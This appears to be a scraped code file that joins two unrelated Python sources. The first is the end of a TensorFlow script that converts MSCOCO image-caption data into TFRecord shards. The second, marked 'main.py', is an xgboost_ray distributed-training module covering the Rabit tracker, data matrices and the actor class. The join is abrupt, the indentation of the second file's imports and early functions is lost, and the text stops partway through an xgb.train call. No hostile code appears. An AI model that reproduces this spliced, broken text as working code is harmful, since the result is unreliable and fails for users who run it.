    """Wrapper for inserting an int64 Feature into a SequenceExample proto."""
    int64_list = tf.train.Int64List(value=[value])
    return tf.train.Feature(int64_list=int64_list)
def _bytes_feature(value):
    """Wrapper for inserting a bytes Feature into a SequenceExample proto.

    Accepts either ``bytes`` or ``str``; strings are encoded (UTF-8) first
    since BytesList only holds bytes.
    """
    # isinstance is the idiomatic type check and, unlike ``type(value) is
    # str``, also handles str subclasses correctly.
    if isinstance(value, str):
        value = value.encode()
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature_list(values):
    """Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
    return tf.train.FeatureList(feature=list(map(_int64_feature, values)))
def _bytes_feature_list(values):
    """Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
    return tf.train.FeatureList(feature=list(map(_bytes_feature, values)))
def _to_sequence_example(image, decoder, vocab):
    """Builds a SequenceExample proto for an image-caption pair.

    Args:
      image: An ImageMetadata object.
      decoder: An ImageDecoder object.
      vocab: A Vocabulary object.

    Returns:
      A SequenceExample proto, or None (implicitly) when the image file
      contains invalid JPEG data.
    """
    with tf.gfile.FastGFile(image.filename, "rb") as f:
        encoded_image = f.read()

    # Validate the JPEG up front so bad files are skipped, not written.
    try:
        decoder.decode_jpeg(encoded_image)
    except (tf.errors.InvalidArgumentError, AssertionError):
        print("Skipping file with invalid JPEG data: %s" % image.filename)
        return

    context = tf.train.Features(feature={
        "image/image_id": _int64_feature(image.image_id),
        "image/data": _bytes_feature(encoded_image),
    })

    # By this point each ImageMetadata carries exactly one caption (images
    # with multiple captions are replicated upstream).
    assert len(image.captions) == 1
    caption = image.captions[0]
    caption_ids = [vocab.word_to_id(word) for word in caption]
    feature_lists = tf.train.FeatureLists(feature_list={
        "image/caption": _bytes_feature_list(caption),
        "image/caption_ids": _int64_feature_list(caption_ids)
    })
    sequence_example = tf.train.SequenceExample(
        context=context, feature_lists=feature_lists)

    return sequence_example
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
                         num_shards):
    """Processes and saves a subset of images as TFRecord files in one thread.

    Args:
        thread_index: Integer thread identifier within [0, len(ranges)].
        ranges: A list of pairs of integers specifying the ranges of the
            dataset to process in parallel.
        name: Unique identifier specifying the dataset.
        images: List of ImageMetadata.
        decoder: An ImageDecoder object.
        vocab: A Vocabulary object.
        num_shards: Integer number of shards for the output files.
    """
    # Each thread produces N shards where N = num_shards / num_threads. For
    # instance, if num_shards = 128, and num_threads = 2, then the first thread
    # would produce shards [0, 64).
    num_threads = len(ranges)
    assert not num_shards % num_threads
    num_shards_per_batch = int(num_shards / num_threads)
    # Evenly split this thread's image range across its shards.
    shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
                               num_shards_per_batch + 1).astype(int)
    num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
    counter = 0
    for s in range(num_shards_per_batch):
        # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
        shard = thread_index * num_shards_per_batch + s
        output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
        output_file = os.path.join(FLAGS.output_dir, output_filename)
        writer = tf.python_io.TFRecordWriter(output_file)
        shard_counter = 0
        images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
        for i in images_in_shard:
            image = images[i]
            sequence_example = _to_sequence_example(image, decoder, vocab)
            # None means the image had invalid JPEG data and was skipped.
            if sequence_example is not None:
                writer.write(sequence_example.SerializeToString())
                shard_counter += 1
                counter += 1
            # Periodic progress report.
            if not counter % 1000:
                print("%s [thread %d]: Processed %d of %d items in thread batch." %
                      (datetime.now(), thread_index, counter, num_images_in_thread))
                sys.stdout.flush()
        writer.close()
        print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
              (datetime.now(), thread_index, shard_counter, output_file))
        sys.stdout.flush()
        shard_counter = 0
    print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
          (datetime.now(), thread_index, counter, num_shards_per_batch))
    sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
    """Processes a complete data set and saves it as a TFRecord.

    Args:
        name: Unique identifier specifying the dataset.
        images: List of ImageMetadata.
        vocab: A Vocabulary object.
        num_shards: Integer number of shards for the output files.
    """
    # Break up each image into a separate entity for each caption.
    images = [ImageMetadata(image.image_id, image.filename, [caption])
              for image in images for caption in image.captions]
    # Shuffle the ordering of images. Make the randomization repeatable.
    random.seed(12345)
    random.shuffle(images)
    # Break the images into num_threads batches. Batch i is defined as
    # images[ranges[i][0]:ranges[i][1]].
    num_threads = min(num_shards, FLAGS.num_threads)
    # Use the builtin `int` here: the `np.int` alias is deprecated since
    # NumPy 1.20 and removed in NumPy 1.24.
    spacing = np.linspace(0, len(images), num_threads + 1).astype(int)
    ranges = []
    threads = []
    for i in range(len(spacing) - 1):
        ranges.append([spacing[i], spacing[i + 1]])
    # Create a mechanism for monitoring when all threads are finished.
    coord = tf.train.Coordinator()
    # Create a utility for decoding JPEG images to run sanity checks.
    decoder = ImageDecoder()
    # Launch a thread for each batch.
    print("Launching %d threads for spacings: %s" % (num_threads, ranges))
    for thread_index in range(len(ranges)):
        args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
        t = threading.Thread(target=_process_image_files, args=args)
        t.start()
        threads.append(t)
    # Wait for all the threads to terminate.
    coord.join(threads)
    print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
          (datetime.now(), len(images), name))
def _create_vocab(captions):
    """Creates the vocabulary of word to word_id.

    The vocabulary is saved to disk in a text file of word counts. The id of
    each word in the file is its corresponding 0-based line number.

    Args:
        captions: A list of lists of strings.

    Returns:
        A Vocabulary object.
    """
    print("Creating vocabulary.")
    counter = Counter()
    for c in captions:
        counter.update(c)
    print("Total words:", len(counter))
    # Filter uncommon words and sort by descending count.
    word_counts = [x for x in list(counter.items()) if x[1] >= FLAGS.min_word_count]
    word_counts.sort(key=lambda x: x[1], reverse=True)
    print("Words in vocabulary:", len(word_counts))
    # Write out the word counts file.
    with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
        f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
    print("Wrote vocabulary file:", FLAGS.word_counts_output_file)
    # Create the vocabulary dictionary.
    reverse_vocab = [x[0] for x in word_counts]
    # Out-of-vocabulary words all map to a single "unknown" id placed just
    # past the known ids.
    unk_id = len(reverse_vocab)
    vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])
    vocab = Vocabulary(vocab_dict, unk_id)
    return vocab
def _process_caption(caption):
    """Processes a caption string into a list of tokenized words.

    Args:
        caption: A string caption.

    Returns:
        A list of strings; the tokenized, lower-cased caption wrapped in
        the special start and end words.
    """
    tokenized_caption = [FLAGS.start_word]
    tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower()))
    tokenized_caption.append(FLAGS.end_word)
    return tokenized_caption
def _load_and_process_metadata(captions_file, image_dir):
    """Loads image metadata from a JSON file and processes the captions.

    Args:
        captions_file: JSON file containing caption annotations.
        image_dir: Directory containing the image files.

    Returns:
        A list of ImageMetadata.
    """
    with tf.gfile.FastGFile(captions_file, "r") as f:
        caption_data = json.load(f)
    # Extract the filenames.
    id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]
    # Extract the captions. Each image_id is associated with multiple captions.
    id_to_captions = {}
    for annotation in caption_data["annotations"]:
        image_id = annotation["image_id"]
        caption = annotation["caption"]
        id_to_captions.setdefault(image_id, [])
        id_to_captions[image_id].append(caption)
    # Every image must have captions and every caption must have an image.
    assert len(id_to_filename) == len(id_to_captions)
    assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
    print("Loaded caption metadata for %d images from %s" %
          (len(id_to_filename), captions_file))
    # Process the captions and combine the data into a list of ImageMetadata.
    print("Processing captions.")
    image_metadata = []
    num_captions = 0
    for image_id, base_filename in id_to_filename:
        filename = os.path.join(image_dir, base_filename)
        captions = [_process_caption(c) for c in id_to_captions[image_id]]
        image_metadata.append(ImageMetadata(image_id, filename, captions))
        num_captions += len(captions)
    print("Finished processing %d captions for %d images in %s" %
          (num_captions, len(id_to_filename), captions_file))
    return image_metadata
def main(unused_argv):
    """Entry point: build the vocabulary and write train/val/test shards."""

    def _is_valid_num_shards(num_shards):
        """Returns True if num_shards is compatible with FLAGS.num_threads."""
        return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads

    assert _is_valid_num_shards(FLAGS.train_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
    assert _is_valid_num_shards(FLAGS.val_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
    assert _is_valid_num_shards(FLAGS.test_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
    if not tf.gfile.IsDirectory(FLAGS.output_dir):
        tf.gfile.MakeDirs(FLAGS.output_dir)
    # Load image metadata from caption files.
    mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
                                                      FLAGS.train_image_dir)
    mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
                                                    FLAGS.val_image_dir)
    # Redistribute the MSCOCO data as follows:
    #   train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
    #   val_dataset = 5% of mscoco_val_dataset (for validation during training).
    #   test_dataset = 10% of mscoco_val_dataset (for final evaluation).
    train_cutoff = int(0.85 * len(mscoco_val_dataset))
    val_cutoff = int(0.90 * len(mscoco_val_dataset))
    train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
    val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
    test_dataset = mscoco_val_dataset[val_cutoff:]
    # Create vocabulary from the training captions.
    train_captions = [c for image in train_dataset for c in image.captions]
    vocab = _create_vocab(train_captions)
    _process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
    _process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
    _process_dataset("test", test_dataset, vocab, FLAGS.test_shards)
if __name__ == "__main__":
    # tf.app.run() parses FLAGS and then invokes main().
    tf.app.run()
|
main.py | from typing import Tuple, Dict, Any, List, Optional, Callable, Union, Sequence
from dataclasses import dataclass, field
from distutils.version import LooseVersion
import functools
import multiprocessing
import os
import pickle
import time
import threading
import warnings
import re
import inspect
import numpy as np
import pandas as pd
from xgboost_ray.xgb import xgboost as xgb
from xgboost.core import XGBoostError
try:
from xgboost.core import EarlyStopException
except ImportError:
class EarlyStopException(XGBoostError):
pass
from xgboost_ray.callback import DistributedCallback, \
DistributedCallbackContainer
from xgboost_ray.compat import TrainingCallback, RabitTracker, LEGACY_CALLBACK
try:
import ray
from ray import logger
from ray.exceptions import RayActorError, RayTaskError
from ray.actor import ActorHandle
from ray.util import get_node_ip_address, placement_group
from ray.util.annotations import PublicAPI, DeveloperAPI
from ray.util.placement_group import PlacementGroup, \
remove_placement_group, get_current_placement_group
from xgboost_ray.util import Event, Queue, MultiActorTask, \
force_on_current_node
if LooseVersion(ray.__version__) >= LooseVersion("1.5.0"):
# https://github.com/ray-project/ray/pull/16437
DEFAULT_PG = "default"
else:
DEFAULT_PG = None
RAY_INSTALLED = True
except ImportError:
ray = get_node_ip_address = Queue = Event = ActorHandle = logger = None
def PublicAPI(f):
@functools.wraps(f)
def inner_f(*args, **kwargs):
return f(*args, **kwargs)
return inner_f
DeveloperAPI = PublicAPI
RAY_INSTALLED = False
from xgboost_ray.tune import _try_add_tune_callback, _get_tune_resources, \
TUNE_USING_PG, is_session_enabled
from xgboost_ray.matrix import RayDMatrix, combine_data, \
RayDeviceQuantileDMatrix, RayDataIter, concat_dataframes, \
LEGACY_MATRIX
from xgboost_ray.session import init_session, put_queue, \
set_session_queue
def _get_environ(item: str, old_val: Any):
env_var = f"RXGB_{item}"
new_val = old_val
if env_var in os.environ:
new_val_str = os.environ.get(env_var)
if isinstance(old_val, bool):
new_val = bool(int(new_val_str))
elif isinstance(old_val, int):
new_val = int(new_val_str)
elif isinstance(old_val, float):
new_val = float(new_val_str)
else:
new_val = new_val_str
return new_val
@dataclass
class _XGBoostEnv:
    """Library tunables; each field is overridable via ``RXGB_<NAME>``."""
    # Whether to use SPREAD placement group strategy for training.
    USE_SPREAD_STRATEGY: bool = True
    # How long to wait for placement group creation before failing.
    PLACEMENT_GROUP_TIMEOUT_S: int = 100
    # Status report frequency when waiting for initial actors
    # and during training
    STATUS_FREQUENCY_S: int = 30
    # If restarting failed actors is disabled
    ELASTIC_RESTART_DISABLED: bool = False
    # How often to check for new available resources
    ELASTIC_RESTART_RESOURCE_CHECK_S: int = 30
    # How long to wait before triggering a new start of the training loop
    # when new actors become available
    ELASTIC_RESTART_GRACE_PERIOD_S: int = 10

    def __getattribute__(self, item):
        # Re-check the environment on every attribute access so env-var
        # overrides take effect even after this object was constructed.
        # super().__getattribute__ is used to avoid infinite recursion.
        old_val = super(_XGBoostEnv, self).__getattribute__(item)
        new_val = _get_environ(item, old_val)
        if new_val != old_val:
            # Cache the override so future reads return the new value.
            setattr(self, item, new_val)
        return super(_XGBoostEnv, self).__getattribute__(item)
# Singleton holding all environment-variable-tunable settings.
ENV = _XGBoostEnv()
# `xgb` may be None when XGBoost could not be imported at module load.
xgboost_version = xgb.__version__ if xgb else "0.0.0"
LEGACY_WARNING = (
    f"You are using `xgboost_ray` with a legacy XGBoost version "
    f"(version {xgboost_version}). While we try to support "
    f"older XGBoost versions, please note that this library is only "
    f"fully tested and supported for XGBoost >= 1.4. Please consider "
    f"upgrading your XGBoost version (`pip install -U xgboost`).")
# XGBoost version as an int tuple for comparisions
# (e.g. "1.4.2rc1" -> (1, 4, 2); non-numeric characters are stripped first).
XGBOOST_VERSION_TUPLE = tuple(
    int(x) for x in re.sub(r"[^\.0-9]", "", xgboost_version).split("."))
class RayXGBoostTrainingError(RuntimeError):
    """Signals that the local ``xgb.train`` call inside
    ``RayXGBoostActor.train()`` did not complete."""
class RayXGBoostTrainingStopped(RuntimeError):
    """Signals that ``RayXGBoostActor.train()`` ended because training
    was deliberately stopped (e.g. via the driver's stop event)."""
class RayXGBoostActorAvailable(RuntimeError):
    """Raised from `_update_scheduled_actor_states()` when new actors
    become available during elastic training."""
def _assert_ray_support():
    """Raise an informative ImportError when Ray is not installed."""
    if RAY_INSTALLED:
        return
    raise ImportError(
        "Ray needs to be installed in order to use this module. "
        "Try: `pip install ray`")
def _maybe_print_legacy_warning():
    """Warn once if a legacy matrix or callback API is in use."""
    legacy_in_use = LEGACY_MATRIX or LEGACY_CALLBACK
    if legacy_in_use:
        warnings.warn(LEGACY_WARNING)
def _is_client_connected() -> bool:
    """Best-effort check whether a Ray client connection is active."""
    try:
        connected = ray.util.client.ray.is_connected()
    except Exception:
        connected = False
    return connected
class _RabitTrackerCompatMixin:
    """Fallback calls to legacy terminology.

    Forwards the newer tracker method names to the legacy
    ``slave``-terminology methods provided by the wrapped RabitTracker.
    """

    def accept_workers(self, n_workers: int):
        # Delegate to the legacy method name.
        return self.accept_slaves(n_workers)

    def worker_envs(self):
        # Delegate to the legacy method name.
        return self.slave_envs()
class _RabitTracker(RabitTracker, _RabitTrackerCompatMixin):
    """
    This method overwrites the xgboost-provided RabitTracker to switch
    from a daemon thread to a multiprocessing Process. This is so that
    we are able to terminate/kill the tracking process at will.
    """

    def start(self, nworker):
        # TODO: refactor RabitTracker to support spawn process creation.
        # In python 3.8, spawn is used as default process creation on macOS.
        # But spawn doesn't work because `run` is not pickleable.
        # For now we force the start method to use fork.
        multiprocessing.set_start_method("fork", force=True)

        def run():
            self.accept_workers(nworker)

        # Kept under the legacy attribute name `thread` even though it is
        # now a Process, so existing callers keep working.
        self.thread = multiprocessing.Process(target=run, args=())
        self.thread.start()
def _start_rabit_tracker(num_workers: int):
    """Start Rabit tracker. The workers connect to this tracker to share
    their results.

    The Rabit tracker is the main process that all local workers connect to
    to share their weights. When one or more actors die, we want to
    restart the Rabit tracker, too, for two reasons: First we don't want to
    be potentially stuck with stale connections from old training processes.
    Second, we might restart training with a different number of actors, and
    for that we would have to restart the tracker anyway.

    To do this we start the Tracker in its own subprocess with its own PID.
    We can use this process then to specifically kill/terminate the tracker
    process in `_stop_rabit_tracker` without touching other functionality.

    Returns:
        Tuple of the tracker process handle and the environment dict the
        workers need to connect (tracker host/port plus DMLC_NUM_WORKER).
    """
    host = get_node_ip_address()
    env = {"DMLC_NUM_WORKER": num_workers}
    rabit_tracker = _RabitTracker(host, num_workers)
    # Get tracker Host + IP
    env.update(rabit_tracker.worker_envs())
    rabit_tracker.start(num_workers)
    logger.debug(
        f"Started Rabit tracker process with PID {rabit_tracker.thread.pid}")
    return rabit_tracker.thread, env
def _stop_rabit_tracker(rabit_process: multiprocessing.Process):
    """Stop the Rabit tracker process, escalating to terminate if needed."""
    logger.debug(f"Stopping Rabit process with PID {rabit_process.pid}")
    # Give the process a grace period to exit on its own, then force it.
    # NOTE(review): there is no join() after terminate(), so a process that
    # needed terminating may linger as a zombie until the parent reaps it
    # -- confirm this is intended.
    rabit_process.join(timeout=5)
    rabit_process.terminate()
class _RabitContext:
    """This context is used by local training actors to connect to the
    Rabit tracker.

    Args:
        actor_id (str): Unique actor ID
        args (list): Arguments for Rabit initialisation. These are
            environment variables to configure Rabit clients.
    """

    def __init__(self, actor_id, args):
        # NOTE: the caller's list is mutated in place -- the task-id entry
        # is appended to `args` itself, not to a copy.
        self.args = args
        self.args.append(("DMLC_TASK_ID=[xgboost.ray]:" + actor_id).encode())

    def __enter__(self):
        # Join the Rabit all-reduce ring.
        xgb.rabit.init(self.args)

    def __exit__(self, *args):
        # Leave the ring, even if training raised.
        xgb.rabit.finalize()
def _ray_get_actor_cpus():
    """Number of CPUs assigned to this actor (None if no CPU resource)."""
    # Query the CPU shares granted to this worker by Ray.
    assigned = ray.worker.get_resource_ids()
    cpu_shares = assigned.get("CPU")
    if cpu_shares is None:
        return None
    return sum(share for _, share in cpu_shares)
def _ray_get_cluster_cpus():
    """Total CPU count reported by the Ray cluster (None if unknown)."""
    cluster_resources = ray.cluster_resources()
    return cluster_resources.get("CPU", None)
def _get_min_node_cpus():
    """Smallest per-node CPU count among alive nodes (at least 1.0)."""
    alive_nodes = (n for n in ray.nodes() if n.get("Alive", False))
    min_node_cpus = min(
        n.get("Resources", {}).get("CPU", 0.0) for n in alive_nodes)
    # Guard against nodes that report zero CPUs.
    if min_node_cpus > 0.0:
        return min_node_cpus
    return 1.0
def _set_omp_num_threads():
    """Sync OMP_NUM_THREADS with this actor's CPU share.

    Sets the variable to the actor's CPU count when known, otherwise
    removes it. Returns the resulting thread count as an int (0 if unset).
    """
    actor_cpus = _ray_get_actor_cpus()
    if actor_cpus:
        os.environ["OMP_NUM_THREADS"] = str(int(actor_cpus))
    else:
        os.environ.pop("OMP_NUM_THREADS", None)
    return int(float(os.environ.get("OMP_NUM_THREADS", "0.0")))
def _get_dmatrix(data: RayDMatrix, param: Dict) -> xgb.DMatrix:
    """Construct a local XGBoost matrix from a loaded data shard.

    Args:
        data: The RayDMatrix descriptor the shard belongs to.
        param: Dict of shard arrays (data/label/weight/qid/base_margin/...)
            as produced by ``RayDMatrix.get_data()``.

    Returns:
        An ``xgb.DMatrix`` (or ``xgb.DeviceQuantileDMatrix``) ready for
        local training/prediction.
    """
    if not LEGACY_MATRIX and isinstance(data, RayDeviceQuantileDMatrix):
        # If we only got a single data shard, create a list so we can
        # iterate over it
        if not isinstance(param["data"], list):
            param["data"] = [param["data"]]
        if not isinstance(param["label"], list):
            param["label"] = [param["label"]]
        if not isinstance(param["weight"], list):
            param["weight"] = [param["weight"]]
        if not isinstance(param["qid"], list):
            param["qid"] = [param["qid"]]
        # BUG FIX: this previously re-checked param["data"] (which is
        # always a list at this point), so base_margin was never wrapped.
        if not isinstance(param["base_margin"], list):
            param["base_margin"] = [param["base_margin"]]
        # Bounds are not supported for the quantile iterator.
        param["label_lower_bound"] = [None]
        param["label_upper_bound"] = [None]
        dm_param = {
            "feature_names": data.feature_names,
            "feature_types": data.feature_types,
            "missing": data.missing,
        }
        param.update(dm_param)
        it = RayDataIter(**param)
        matrix = xgb.DeviceQuantileDMatrix(it, **dm_param)
    else:
        if isinstance(param["data"], list):
            # Multiple shards: concatenate into single frames first.
            dm_param = {
                "data": concat_dataframes(param["data"]),
                "label": concat_dataframes(param["label"]),
                "weight": concat_dataframes(param["weight"]),
                "qid": concat_dataframes(param["qid"]),
                "base_margin": concat_dataframes(param["base_margin"]),
                "label_lower_bound": concat_dataframes(
                    param["label_lower_bound"]),
                "label_upper_bound": concat_dataframes(
                    param["label_upper_bound"]),
            }
            param.update(dm_param)
        ll = param.pop("label_lower_bound", None)
        lu = param.pop("label_upper_bound", None)
        if LEGACY_MATRIX:
            # Older XGBoost DMatrix constructors reject these kwargs.
            param.pop("base_margin", None)
            param.pop("qid", None)
        matrix = xgb.DMatrix(**param)
        if not LEGACY_MATRIX:
            matrix.set_info(label_lower_bound=ll, label_upper_bound=lu)
    data.update_matrix_properties(matrix)
    return matrix
@PublicAPI(stability="beta")
@dataclass
class RayParams:
    """Parameters to configure Ray-specific behavior.

    Args:
        num_actors (int): Number of parallel Ray actors.
        cpus_per_actor (int): Number of CPUs to be used per Ray actor.
        gpus_per_actor (int): Number of GPUs to be used per Ray actor.
        resources_per_actor (Optional[Dict]): Dict of additional resources
            required per Ray actor.
        elastic_training (bool): If True, training will continue with
            fewer actors if an actor fails. Default False.
        max_failed_actors (int): If `elastic_training` is True, this
            specifies the maximum number of failed actors with which
            we still continue training.
        max_actor_restarts (int): Number of retries when Ray actors fail.
            Defaults to 0 (no retries). Set to -1 for unlimited retries.
        checkpoint_frequency (int): How often to save checkpoints. Defaults
            to ``5`` (every 5th iteration).
        distributed_callbacks (Optional[List[DistributedCallback]]): Hooks
            invoked on the remote actors around init, data loading,
            training and prediction.
    """
    # Actor scheduling
    num_actors: int = 0
    cpus_per_actor: int = 0
    gpus_per_actor: int = -1  # -1 means "autodetect"
    resources_per_actor: Optional[Dict] = None
    # Fault tolerance
    elastic_training: bool = False
    max_failed_actors: int = 0
    max_actor_restarts: int = 0
    checkpoint_frequency: int = 5
    # Distributed callbacks
    distributed_callbacks: Optional[List[DistributedCallback]] = None

    def get_tune_resources(self):
        """Return the resources to use for xgboost_ray training with Tune."""
        if self.cpus_per_actor <= 0 or self.num_actors <= 0:
            raise ValueError("num_actors and cpus_per_actor both must be "
                             "greater than 0.")
        return _get_tune_resources(
            num_actors=self.num_actors,
            cpus_per_actor=self.cpus_per_actor,
            gpus_per_actor=max(0, self.gpus_per_actor),
            resources_per_actor=self.resources_per_actor)
@dataclass
class _Checkpoint:
    """Serialized booster state sent from the rank-0 actor to the driver."""
    # Boosting iteration the checkpoint was taken at; -1 marks the final,
    # post-training checkpoint.
    iteration: int = 0
    # Pickled xgb.Booster, or None if no checkpoint was stored yet.
    value: Optional[bytes] = None
def _validate_ray_params(ray_params: Union[None, RayParams, dict]) \
        -> RayParams:
    """Coerce ``ray_params`` to a ``RayParams`` and validate actor counts."""
    if ray_params is None:
        validated = RayParams()
    elif isinstance(ray_params, dict):
        validated = RayParams(**ray_params)
    elif isinstance(ray_params, RayParams):
        validated = ray_params
    else:
        raise ValueError(
            f"`ray_params` must be a `RayParams` instance, a dict, or None, "
            f"but it was {type(ray_params)}."
            f"\nFIX THIS preferably by passing a `RayParams` instance as "
            f"the `ray_params` parameter.")
    num_actors = validated.num_actors
    if num_actors <= 0:
        raise ValueError(
            "The `num_actors` parameter is set to 0. Please always specify "
            "the number of distributed actors you want to use."
            "\nFIX THIS by passing a `RayParams(num_actors=X)` argument "
            "to your call to xgboost_ray.")
    if num_actors < 2:
        # Single-actor setups work, but nothing is actually distributed.
        warnings.warn(
            f"`num_actors` in `ray_params` is smaller than 2 "
            f"({num_actors}). XGBoost will NOT be distributed!")
    return validated
@DeveloperAPI
class RayXGBoostActor:
    """Remote Ray XGBoost actor class.

    This remote actor handles local training and prediction of one data
    shard. It initializes a Rabit context, thus connecting to the Rabit
    all-reduce ring, and initializes local training, sending updates
    to other workers.

    The actor with rank 0 also checkpoints the model periodically and
    sends the checkpoint back to the driver.

    Args:
        rank (int): Rank of the actor. Must be ``0 <= rank < num_actors``.
        num_actors (int): Total number of actors.
        queue (Queue): Ray queue to communicate with main process.
        stop_event (Event): Event actor the driver sets to interrupt
            training.
        checkpoint_frequency (int): How often to store checkpoints. Defaults
            to ``5``, saving checkpoints every 5 boosting rounds.
        distributed_callbacks (Optional[List[DistributedCallback]]): Hooks
            invoked around init, data loading, training and prediction.
    """

    def __init__(
            self,
            rank: int,
            num_actors: int,
            queue: Optional[Queue] = None,
            stop_event: Optional[Event] = None,
            checkpoint_frequency: int = 5,
            distributed_callbacks: Optional[List[DistributedCallback]] = None):
        self.queue = queue
        init_session(rank, self.queue)
        self.rank = rank
        self.num_actors = num_actors
        self.checkpoint_frequency = checkpoint_frequency
        # Loaded shard parameter dicts, keyed by RayDMatrix descriptor.
        self._data: Dict[RayDMatrix, xgb.DMatrix] = {}
        # Number of local rows per loaded RayDMatrix.
        self._local_n: Dict[RayDMatrix, int] = {}
        self._stop_event = stop_event
        self._distributed_callbacks = DistributedCallbackContainer(
            distributed_callbacks)
        self._distributed_callbacks.on_init(self)
        _set_omp_num_threads()
        logger.debug(f"Initialized remote XGBoost actor with rank {self.rank}")

    def set_queue(self, queue: Queue):
        """Attach a (new) driver queue and propagate it to the session."""
        self.queue = queue
        set_session_queue(self.queue)

    def set_stop_event(self, stop_event: Event):
        """Attach a (new) stop event used to interrupt training."""
        self._stop_event = stop_event

    def _get_stop_event(self):
        # Indirection used by the stop callback to detect event swaps.
        return self._stop_event

    def pid(self):
        """Get process PID. Used for checking if still alive"""
        return os.getpid()

    def ip(self):
        """Get node IP address."""
        return get_node_ip_address()

    def _save_checkpoint_callback(self):
        """Send checkpoints to driver"""
        this = self

        class _SaveInternalCheckpointCallback(TrainingCallback):
            def after_iteration(self, model, epoch, evals_log):
                # Only rank 0 checkpoints, every `checkpoint_frequency`
                # boosting rounds.
                if xgb.rabit.get_rank() == 0 and \
                        epoch % this.checkpoint_frequency == 0:
                    put_queue(_Checkpoint(epoch, pickle.dumps(model)))

            def after_training(self, model):
                # iteration=-1 marks the final, post-training checkpoint.
                if xgb.rabit.get_rank() == 0:
                    put_queue(_Checkpoint(-1, pickle.dumps(model)))
                return model

        return _SaveInternalCheckpointCallback()

    def _stop_callback(self):
        """Stop if event is set"""
        this = self
        # Keep track of initial stop event. Since we're training in a thread,
        # the stop event might be overwritten, which should be handled
        # as if the previous stop event was set.
        initial_stop_event = self._stop_event

        class _StopCallback(TrainingCallback):
            def after_iteration(self, model, epoch, evals_log):
                try:
                    if this._stop_event.is_set() or \
                            this._get_stop_event() is not initial_stop_event:
                        # Legacy XGBoost stops via an exception.
                        if LEGACY_CALLBACK:
                            raise EarlyStopException(epoch)
                        # Returning True stops training
                        return True
                except RayActorError:
                    # The stop event actor died -- treat as a stop signal.
                    if LEGACY_CALLBACK:
                        raise EarlyStopException(epoch)
                    return True

        return _StopCallback()

    def load_data(self, data: RayDMatrix):
        """Load this actor's shard of ``data`` (no-op if already loaded)."""
        if data in self._data:
            return
        self._distributed_callbacks.before_data_loading(self, data)
        param = data.get_data(self.rank, self.num_actors)
        # A list of shards may be returned; record the total row count.
        if isinstance(param["data"], list):
            self._local_n[data] = sum(len(a) for a in param["data"])
        else:
            self._local_n[data] = len(param["data"])
        self._data[data] = param
        self._distributed_callbacks.after_data_loading(self, data)

    def train(self, rabit_args: List[str], return_bst: bool,
              params: Dict[str, Any], dtrain: RayDMatrix,
              evals: Tuple[RayDMatrix, str], *args,
              **kwargs) -> Dict[str, Any]:
        """Run local ``xgb.train`` on this actor's shard.

        Returns a dict with ``evals_result``, ``train_n`` and (when
        ``return_bst`` is True) the trained ``bst`` booster.

        Raises:
            RayXGBoostTrainingStopped: If the driver set the stop event.
            RayXGBoostTrainingError: If local training failed.
        """
        self._distributed_callbacks.before_train(self)
        num_threads = _set_omp_num_threads()
        local_params = params.copy()
        if "xgb_model" in kwargs:
            if isinstance(kwargs["xgb_model"], bytes):
                # bytearray type gets lost in remote actor call
                kwargs["xgb_model"] = bytearray(kwargs["xgb_model"])
        # Set the number of local threads unless the caller specified it.
        if "nthread" not in local_params and "n_jobs" not in local_params:
            if num_threads > 0:
                local_params["nthread"] = num_threads
                local_params["n_jobs"] = num_threads
            else:
                local_params["nthread"] = sum(
                    num
                    for _, num in ray.worker.get_resource_ids().get("CPU", []))
                local_params["n_jobs"] = local_params["nthread"]
        if dtrain not in self._data:
            self.load_data(dtrain)
        for deval, _name in evals:
            if deval not in self._data:
                self.load_data(deval)
        evals_result = dict()
        # Append the internal checkpoint/stop callbacks to the user's ones.
        if "callbacks" in kwargs:
            callbacks = kwargs["callbacks"] or []
        else:
            callbacks = []
        callbacks.append(self._save_checkpoint_callback())
        callbacks.append(self._stop_callback())
        kwargs["callbacks"] = callbacks
        result_dict = {}
        error_dict = {}

        # We run xgb.train in a thread to be able to react to the stop event.
        def _train():
            try:
                with _RabitContext(str(id(self)), rabit_args):
                    local_dtrain = _get_dmatrix(dtrain, self._data[dtrain])
                    if not local_dtrain.get_label().size:
                        raise RuntimeError(
                            "Training data has no label set. Please make sure "
                            "to set the `label` argument when initializing "
                            "`RayDMatrix()` for data you would like "
                            "to train on.")
                    local_evals = []
                    for deval, name in evals:
                        local_evals.append((_get_dmatrix(
                            deval, self._data[deval]), name))
                    # Legacy XGBoost does not invoke the new-style callback
                    # hooks itself, so do it manually.
                    if LEGACY_CALLBACK:
                        for xgb_callback in kwargs.get("callbacks", []):
                            if isinstance(xgb_callback, TrainingCallback):
                                xgb_callback.before_training(None)
                    bst = xgb.train(
